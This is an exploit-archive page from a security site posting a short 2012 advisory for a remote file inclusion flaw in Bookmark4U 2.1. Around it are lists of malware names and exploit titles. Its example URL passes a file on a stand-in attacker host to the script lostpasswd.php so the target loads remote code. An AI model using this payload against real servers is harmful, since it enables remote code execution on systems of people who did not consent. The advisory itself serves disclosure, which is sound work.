SecurityHome.eu Bookmark4U 2.1 Remote File Inclusion

Articles
Books
Bulletins
Events
Exploits
Hardware
Mailings
Malware
News
OS
Software
Vulnerabilities

Contact us
Forum
Links
RSS
Site Map

Home / exploits PDF &nsp;

Bookmark4U 2.1 Remote File Inclusion
Posted on 03 July 2012
vendor - http://bookmark4u.sourceforge.net/
version - 2.1
solution - product discontinued

example -
http://[target]/bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://[attacker]/path/to/file.txt???
TOP

Malware :

Virus:Win32/Sirefef.gen!C
Virus:Win32/Sirefef.gen!B
VirTool:Win32/CeeInject.gen!JN
VirTool:Win32/Injector.gen!DH
VirTool:Win32/Injector.gen!DL
Trojan:JS/BlacoleRef.CZ
Trojan:JS/BlacoleRef.DD
Worm:VBS/Jenxcus.A
Trojan:WinNT/Sirefef.N
Trojan:WinNT/Sirefef.J

Last 20

Exploits :

SAS Integration Technologies Client 9.31_M1 Buffer Overflow
Nginx HTTP Server 1.3.9-1.4.0 Chunked Encoding Stack Buffer Overflow
<strong>Nginx HTTP Server 1.3.9-1.4.0 Chunked Encoding Stack Buffer Overflow</strong>
<strong>Nginx HTTP Server 1.3.9-1.4.0 Chunked Encoding Stack Buffer Overflow</strong>
Matterdaddy Market 1.4.2 Cross Site Request Forgery / Arbitrary File Upload
vBulletin 5b SQL Injection
AVE.CMS 2.09 Blind SQL Injection
Spider Catalog 1.4.6 Cross Site Scripting / Path Disclosure / SQL Injection
Spider Event Calendar 1.3.0 Cross Site Scripting / Path Disclosure / SQL Injection
Weyal CMS SQL Injection

Last 20